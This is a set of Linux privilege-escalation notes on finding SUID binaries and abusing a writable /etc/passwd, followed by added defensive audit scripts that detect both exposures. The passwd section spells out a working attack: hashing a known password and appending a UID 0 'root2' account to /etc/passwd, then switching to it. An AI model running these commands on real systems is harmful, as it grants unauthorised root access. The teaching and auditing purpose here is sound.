Enumerating Attack Vectors
Enumerating SUID binaries
SUID is a special file permission for executable files which lets other users run the file with the effective permissions of the file owner. Instead of the normal x, which represents execute permission, you will see an s (indicating SUID) in the owner's permission bits.
Obviously, for a quick win, you want to find SUID binaries whose owner is the root user.
HackTricks has a page with more information on this topic.
You can find SUID binaries in many ways; the following are some example commands:
find / -perm -4000 2>/dev/null
find / -perm /4000 2>/dev/null
find / -perm /u+s 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
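The commands above answer "which SUID files exist"; the question a defender or reviewer actually needs answered is "which of them should not be there". The following shell audit is an added example, not part of the original notes: it lists SUID files under a tree (the same `-perm -4000` test as above), keeps the root-owned subset, and reports any file that is missing from a known-good baseline. The demo tree, the file names in it, the baseline and the function names are all constructed for this example.

```shell
#!/bin/sh
# Added example, not part of the original notes: a small audit that lists the
# SUID binaries under a tree and reports any that are not in a known-good
# baseline. The sample tree and baseline below are constructed for the demo;
# on a real host call the functions with / and a baseline taken from a clean
# install of the same image.

# list_suid DIR: regular files under DIR with the setuid bit set, sorted.
# "-perm -4000" means "all of these bits set"; for a single bit this is the
# same as "-perm /4000" and "-perm /u+s" used in the notes above.
list_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | sort
}

# list_root_suid DIR: the subset of SUID files owned by root.
list_root_suid() {
    find "$1" -type f -user root -perm -4000 2>/dev/null | sort
}

# count_suid DIR: number of SUID files under DIR (whitespace stripped so the
# result is usable in arithmetic with any wc implementation).
count_suid() {
    list_suid "$1" | wc -l | tr -d ' '
}

# unexpected_suid DIR BASELINE: SUID files under DIR whose path, relative to
# DIR, does not appear in BASELINE (one relative path per line). The trailing
# "|| true" keeps the function's status 0 when nothing is unexpected.
unexpected_suid() {
    dir=$1
    baseline=$2
    list_suid "$dir" | sed "s|^$dir/||" | grep -v -x -F -f "$baseline" || true
}

# --- constructed demo tree (hypothetical paths, not from the notes) ---------
demo_dir=$(mktemp -d)
trap 'rm -rf "$demo_dir"' EXIT
mkdir -p "$demo_dir/usr/bin" "$demo_dir/tmp"
printf '#!/bin/sh\necho passwd\n' > "$demo_dir/usr/bin/passwd"   # expected SUID helper
printf '#!/bin/sh\necho ls\n'     > "$demo_dir/usr/bin/ls"       # ordinary binary
printf '#!/bin/sh\necho hi\n'     > "$demo_dir/tmp/helper"       # SUID file nobody expects
chmod 4755 "$demo_dir/usr/bin/passwd" "$demo_dir/tmp/helper"
chmod 0755 "$demo_dir/usr/bin/ls"
printf 'usr/bin/passwd\n' > "$demo_dir/baseline.txt"

# Report when run directly.
echo "SUID files under $demo_dir: $(count_suid "$demo_dir")"
echo "Root-owned SUID files:"
list_root_suid "$demo_dir"
echo "Not in baseline:"
unexpected_suid "$demo_dir" "$demo_dir/baseline.txt"
```

On a real host the baseline is taken from a clean install of the same image (or from the package manager's file lists), and every path the audit reports should either be explained or have its setuid bit removed.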
Other Tricks - Miscellaneous
This section contains some specific things which could help you find unusual vectors to escalate your privileges.
Writeable passwd file
Always check whether you have write permissions on the /etc/passwd file. If that is the case, you can effectively set an arbitrary password for any account.
To check, use ls -la /etc/passwd
Supposing you have write permissions, you can generate a password hash and use it to log in as root as follows:
Generate the password hash:
openssl passwd w00t
Output: Fdzt.eqJQ4s0g
Append a new entry carrying the password hash to the passwd file:
echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd
Now you can log in as root using
su root2
and entering w00t as the user's password.
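From the defender's side, the same three facts that make this work are what a host check should look for: a passwd file that unprivileged users can modify, a second account with UID 0, and a password hash stored in passwd instead of shadow. The following script is an added example, not part of the original notes: it implements those checks as shell functions and runs them against a constructed sample passwd file containing the exact root2 line from above. The function names are mine; on a real host the functions are pointed at /etc/passwd instead of the sample.

```shell
#!/bin/sh
# Added example, not part of the original notes: the checks a defender runs
# against /etc/passwd to catch the exposure described above. The sample file
# below is constructed for the demo; on a real host pass /etc/passwd instead.

# loose_mode FILE: status 0 if FILE is group- or world-writable (in "ls -l"
# output, columns 6 and 9 are the group and other write bits), 1 otherwise.
loose_mode() {
    mode=$(ls -ld "$1" | cut -c1-10)
    case "$mode" in
        ?????w????|????????w?) return 0 ;;
        *) return 1 ;;
    esac
}

# extra_uid0 FILE: account names with UID 0 other than "root". Any such entry
# is a second root login, whatever its name says.
extra_uid0() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# inline_hashes FILE: accounts whose password field is neither the shadow
# placeholder "x" nor a locked marker ("*", "!", "!!"). A real hash here can be
# read by every local user; an empty field means no password is required.
inline_hashes() {
    awk -F: '$2 != "x" && $2 != "*" && $2 != "!" && $2 != "!!" { print $1 }' "$1"
}

# audit_passwd FILE: print one finding per line; prints nothing when clean.
audit_passwd() {
    f=$1
    if loose_mode "$f"; then echo "mode: $f is group/world-writable"; fi
    for u in $(extra_uid0 "$f"); do echo "uid0: $u has UID 0"; done
    for u in $(inline_hashes "$f"); do echo "hash: $u has a password field in passwd"; done
    return 0
}

# --- constructed sample passwd file ---------------------------------------
sample=$(mktemp)
trap 'rm -f "$sample"' EXIT
cat > "$sample" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:alice:/home/alice:/bin/bash
root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash
EOF
chmod 666 "$sample"   # deliberately loose, so the mode check fires in the demo

audit_passwd "$sample"
```

Run against a healthy host the script prints nothing; the fix for a reported mode finding is chmod 644 on /etc/passwd, and any uid0 or hash finding is an account to remove or move back into /etc/shadow, after working out how the line got there.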